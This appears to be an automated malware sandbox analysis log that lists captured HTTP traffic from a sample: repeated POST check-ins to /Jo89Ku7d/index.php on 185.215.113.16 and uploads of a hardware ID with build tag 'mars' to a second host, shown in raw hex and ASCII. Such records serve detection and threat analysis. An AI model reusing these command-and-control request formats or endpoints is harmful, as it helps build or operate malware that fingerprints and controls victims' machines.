Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 46 31 45 45 46 30 42 46 34 32 36 38 31 32 30 39 37 32 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="hwid"FC6F1EEF0BF42681209724------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build"mars------GIEBFHCAKFBGDHIDHIDB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 46 31 45 45 46 30 42 46 34 32 36 38 31 32 30 39 37 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 2d 2d 0d 0a Data Ascii: ------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="hwid"FC6F1EEF0BF42681209724------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="build"mars------BFCGDAAKFHIDBFIDBKFH--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
